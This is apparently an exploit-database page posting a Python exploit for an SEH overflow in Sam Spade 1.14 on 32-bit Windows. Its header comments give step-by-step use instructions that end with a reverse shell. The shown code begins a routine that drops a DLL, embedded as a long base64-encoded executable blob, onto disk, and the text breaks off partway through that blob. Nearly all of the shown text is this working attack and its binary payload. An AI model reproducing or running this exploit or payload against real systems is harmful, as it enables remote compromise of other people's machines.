Share
## https://sploitus.com/exploit?id=PACKETSTORM:189707
# Exploit Title: Sam Spade 1.14 - SEH Overflow via Arbitrary DLL Injection
# Date: 14.03.2024
# Software Link: https://www.majorgeeks.com/files/details/sam_spade.html
# Exploit Author: Ahmet รmit BAYRAM
# Tested Version: 1.14
# Tested on: Windows 10 32bit
# Prepare the listener
# Open Sam Spade
# Run exploit.py in the directory where Sam Spade is installed
# Open the generated payload.txt file and copy its contents
# Go to Tools > Scan Addresses
# Paste into the "Scan From IP Address" box and click OK
# Your reverse shell is ready!
import sys
import struct
from base64 import b64decode
from time import sleep
import ctypes
from ctypes import byref, c_int, c_ulong, create_string_buffer, windll
def dropping_dll():
# Dropping DLL on disk
sleep(2)
print("[+] Dropping arbitrary .dll on disk")
sleep(2)
b64_dll =
"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AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgaUGIAAAAA/////wAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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